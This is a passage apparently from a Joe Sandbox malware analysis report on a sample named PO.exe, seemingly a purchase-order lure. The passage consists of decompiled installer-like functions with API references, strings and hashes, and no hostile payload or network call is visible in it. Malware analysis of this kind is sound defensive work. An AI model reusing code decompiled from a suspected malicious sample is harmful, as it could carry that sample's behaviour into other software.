				if(( *(_t55 - 0x18) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x14)) = E00402BBF(0x33);
				}
				__eflags =  *(_t55 - 0x18) & 0x00000002;
				if(( *(_t55 - 0x18) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402BBF(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x30)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402BBF();
					_t28 = E00402BBF();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExW( *(_t55 - 0x14),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E00402BA2();
					_t37 = E00402BA2();
					_t48 =  *(_t55 - 0x18) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageW(_t52, _t37,  *(_t55 - 0x14),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutW(_t52, _t37,  *(_t55 - 0x14),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x2c)) >= _t42) {
					_push( *(_t55 - 8));
					E004060C5();
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}

0x00401be8
0x00401bf4
0x00401bf7
0x00401c00
0x00401c00
0x00401c03
0x00401c07
0x00401c10
0x00401c10
0x00401c13
0x00401c17
0x00401c19
0x00401c66
0x00401c68
0x00401c73
0x00401c7d
0x00401c80
0x00401c80
0x00401c89
0x00000000
0x00401c1b
0x00401c22
0x00401c24
0x00401c2c
0x00401c2f
0x00401c57
0x00401c8f
0x00401c8f
0x00401c31
0x00401c3f
0x00401c47
0x00401c4a
0x00401c4a
0x00401c2f
0x00401c92
0x00401c95
0x00401c9b
0x004029f2
0x004029f2
0x00402a4f
0x00402a5b

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57

Strings

!, xrefs: 00401C13

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 298dafdcb9fb76c6349735f3086c7c7de60bc97eebb8a6152003ba88438aff8e
Instruction ID: 9ab6cbc1baff8286944736a18d7265b6422843b7a732a624d4201333bc7942cf
Opcode Fuzzy Hash: 298dafdcb9fb76c6349735f3086c7c7de60bc97eebb8a6152003ba88438aff8e
Instruction Fuzzy Hash: F2219071940209BEEF01AFB5CE4AABE7B75EF44744F10403EFA01B61D1D6B88A409B69

Uniqueness

Uniqueness Score: -1.00%

Function 00405B32 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405B32(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405b33
0x00405b40
0x00405b41
0x00405b4c
0x00405b54
0x00405b54
0x00405b5c

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405B38
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405B42
lstrcatW.KERNEL32(?,0040A014), ref: 00405B54

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B32

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
Instruction ID: 1c34604f245f66d13fb295c2dca74b2082213948d97efa3850964b8affffb698
Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
Instruction Fuzzy Hash: 57D05E31101934AAC2116B448C04DDB73AC9E46304341442AF201B70A6C778695286FD

Uniqueness

Uniqueness Score: -1.00%

Function 004038D5 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004038D5() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x2bc
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x2cc
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403932();
				return E0040596F(_t11, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\nsr9735.tmp", 7);
			}

0x004038d5
0x004038e4
0x004038e7
0x004038e9
0x004038e9
0x004038f0
0x004038f8
0x004038fb
0x004038fd
0x004038fd
0x004038fd
0x00403904
0x00403916

APIs

CloseHandle.KERNEL32(000002BC,C:\Users\user\AppData\Local\Temp\,00403708,?), ref: 004038E7
CloseHandle.KERNEL32(000002CC,C:\Users\user\AppData\Local\Temp\,00403708,?), ref: 004038FB

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004038DA
C:\Users\user\AppData\Local\Temp\nsr9735.tmp, xrefs: 0040390B

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsr9735.tmp
API String ID: 2962429428-2205545843
Opcode ID: f084a8137c272c7609008576fb265960e9ac12256820a4da339362f4de570230
Instruction ID: 23b98c188a40640ee87c89e263e7d2a3484f90a0975adae1b2ea6fd77d705eba
Opcode Fuzzy Hash: f084a8137c272c7609008576fb265960e9ac12256820a4da339362f4de570230
Instruction Fuzzy Hash: 78E086B14407149AC124AF7CAD495853A185F453357248726F178F20F0C778996B5E9D

Uniqueness

Uniqueness Score: -1.00%

Function 00403C9D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C9D(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = L"1033";
				_t13 = 0xffff;
				_t6 = E004060DE(__ecx, L"1033");
				while(1) {
					_t26 =  *0x42a284;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x42a250 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42a280;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x429220 = _t18[1];
					 *0x42a2e8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42921c = _t23;
						E004060C5(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextW( *0x423708, E004061A0(_t13, _t24, _t26, 0x429240, 0xfffffffe));
						_t11 =  *0x42a26c;
						_t27 =  *0x42a268;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E004061A0(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x818;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

0x00403ca1
0x00403ca6
0x00403cac
0x00403cb1
0x00403cb1
0x00403cb9
0x00000000
0x00000000
0x00403cc1
0x00403cc9
0x00403ccb
0x00403cd1
0x00403cd1
0x00403cd3
0x00403cdf
0x00000000
0x00000000
0x00403ce3
0x00000000
0x00000000
0x00000000
0x00403ce5
0x00403cea
0x00403cf3
0x00403cf9
0x00403cfe
0x00403d12
0x00403d1d
0x00403d35
0x00403d3b
0x00403d40
0x00403d48
0x00403d69
0x00403d69
0x00403d69
0x00403d4a
0x00403d4c
0x00403d4c
0x00403d50
0x00403d57
0x00403d57
0x00403d5c
0x00403d62
0x00403d62
0x00000000
0x00403d4c
0x00403d00
0x00403d05
0x00403d0e
0x00403d07
0x00403d07
0x00403d07
0x00403d05

APIs

SetWindowTextW.USER32(00000000,00429240), ref: 00403D35

Strings

"C:\Users\user\Desktop\PO.exe", xrefs: 00403C9E
1033, xrefs: 00403CA1, 00403CAB, 00403D1C

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\PO.exe"$1033
API String ID: 530164218-2244132906
Opcode ID: bedfed58f119eb8cdc0f5f3cd8b3d6658457d0e8530e0efc389cee5297b0fc00
Instruction ID: 4786a0dcc4ba2f930af81554b1ec9cb86176e7a1d2ad565e9f211a7c6dcc4e6b
Opcode Fuzzy Hash: bedfed58f119eb8cdc0f5f3cd8b3d6658457d0e8530e0efc389cee5297b0fc00
Instruction Fuzzy Hash: 7111C331B44210ABD7359F15EC40A337B6CEF85715B28427BE801AB3A1C63A9D1296A9

Uniqueness

Uniqueness Score: -1.00%

Function 00405251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00405251(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423714 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423714 = _t16;
							E00404C27();
						}
						L11:
						return CallWindowProcW( *0x42371c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404BA7(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E0040428E(0x413);
				return 0;
			}

0x00405255
0x0040525f
0x0040527b
0x0040529d
0x004052a0
0x004052a6
0x004052b0
0x004052b1
0x004052b3
0x004052b9
0x004052b9
0x004052c3
0x00000000
0x004052d1
0x00405288
0x004052c0
0x004052c0
0x00000000
0x004052c0
0x00405294
0x00405296
0x00000000
0x00405296
0x00405265
0x00000000
0x00000000
0x0040526c
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00405280
CallWindowProcW.USER32(?,?,?,?), ref: 004052D1

Part of subcall function 0040428E: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A0

Strings

, xrefs: 00405261

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
Instruction ID: 35360b72f4910b777185a6264b25dc7760dbd7dc789205491e41d57b326ac1ec
Opcode Fuzzy Hash: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
Instruction Fuzzy Hash: 6B019E71210708ABDF208F11DD84E9B3A35EF94321F60443AFA00761D1C77A8D529E6A

Uniqueness

Uniqueness Score: -1.00%

Function 00405B7E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405B7E(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}

0x00405b7f
0x00405b89
0x00405b8c
0x00405b92
0x00405b93
0x00405b94
0x00405b9c
0x00000000
0x00000000
0x00000000
0x00405b9c
0x00405b9e
0x00405ba6

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO.exe,C:\Users\user\Desktop\PO.exe,80000000,00000003), ref: 00405B84
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO.exe,C:\Users\user\Desktop\PO.exe,80000000,00000003), ref: 00405B94

Strings

C:\Users\user\Desktop, xrefs: 00405B7E

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
Instruction ID: 87bbc210c64b19a6b78a00595756172ded5dec919d443e3f73ce50da7c0279be
Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
Instruction Fuzzy Hash: D4D05EB24009209AD312AB04DD00DAF77ACEF163007464426E841AB166D778BC8186BC

Uniqueness

Uniqueness Score: -1.00%

Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v0;
				void* _t17;
				signed int _t19;
				void* _t20;
				void* _t24;
				void* _t26;
				void* _t30;
				void* _t36;
				void* _t38;
				void* _t39;
				signed int _t41;
				void* _t42;
				void* _t51;
				void* _t52;
				signed short* _t54;
				void* _t56;
				void* _t59;
				void* _t61;

				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
				_t17 = E10001243();
				_v0 = _t17;
				_t52 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_t17);
				} else {
					do {
						_t19 =  *_t52 & 0x0000ffff;
						_t42 = 2;
						_t54 = _t52 + _t42;
						_t61 = _t19 - 0x6c;
						if(_t61 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t52 = _t54 + _t42;
								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t26 = _t20 - _t42;
							if(_t26 == 0) {
								L10:
								_t52 =  &(_t54[1]);
								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
								goto L13;
							}
							L7:
							if(_t26 == 1) {
								_t30 = GlobalAlloc(0x40, _t41 + 4);
								 *_t30 =  *0x10004040;
								 *0x10004040 = _t30;
								E10001563(_t30 + 4,  *0x10004074, _t41);
								_t59 = _t59 + 0xc;
							}
							goto L14;
						}
						if(_t61 == 0) {
							L17:
							_t33 =  *0x10004040;
							if( *0x10004040 != 0) {
								E10001563( *0x10004074, _t33 + 4, _t41);
								_t59 = _t59 + 0xc;
								_t36 =  *0x10004040;
								GlobalFree(_t36);
								 *0x10004040 =  *_t36;
							}
							goto L14;
						}
						_t38 = _t19 - 0x4c;
						if(_t38 == 0) {
							goto L17;
						}
						_t39 = _t38 - 4;
						if(_t39 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L12;
						}
						_t26 = _t39 - _t42;
						if(_t26 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t52 != 0);
					_t17 = _v0;
					goto L16;
				}
			}

0x100010e6
0x100010f0
0x100010ff
0x1000110e
0x10001119
0x1000111c
0x1000112b
0x1000112f
0x10001131
0x100011d8
0x100011de
0x10001137
0x10001138
0x10001138
0x1000113d
0x1000113e
0x10001140
0x10001143
0x1000120d
0x10001210
0x100011b0
0x100011b6
0x100011bf
0x100011c4
0x100011c7
0x00000000
0x100011c7
0x10001212
0x10001214
0x10001196
0x1000119d
0x100011a5
0x00000000
0x100011a5
0x10001161
0x10001162
0x1000116a
0x10001177
0x1000117f
0x10001188
0x1000118d
0x1000118d
0x00000000
0x10001162
0x10001149
0x100011df
0x100011df
0x100011e6
0x100011f3
0x100011f8
0x100011fb
0x10001203
0x10001205
0x10001205
0x00000000
0x100011e6
0x1000114f
0x10001152
0x00000000
0x00000000
0x10001158
0x1000115b
0x100011ac
0x00000000
0x100011ac
0x1000115d
0x1000115f
0x10001192
0x00000000
0x10001192
0x00000000
0x100011c9
0x100011c9
0x100011d3
0x00000000
0x100011d7

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
GlobalFree.KERNEL32(00000000), ref: 100011C7
GlobalFree.KERNEL32(00000000), ref: 100011D9
GlobalFree.KERNEL32(?), ref: 10001203

Memory Dump Source

Source File: 00000001.00000002.85191842667.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.85191813710.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.85191874016.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.85191898523.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_PO.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765

Uniqueness

Uniqueness Score: -1.00%

Function 00405CB8 Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CB8(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405cc8
0x00405cca
0x00405ccd
0x00405cf9
0x00405cd2
0x00405cdb
0x00405ce0
0x00405ceb
0x00405cee
0x00405d0a
0x00405cf0
0x00405cf7
0x00000000
0x00405cf7
0x00405d03
0x00405d07
0x00405d07
0x00405d01
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CC8
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CE0
CharNextA.USER32(00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CF1
lstrlenA.KERNEL32(00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CFA

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
Instruction ID: b09c91cad7c2282b041c35ea214dbdd3f15ee75aa50bf55fe933874c09a5e2ef
Opcode Fuzzy Hash: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
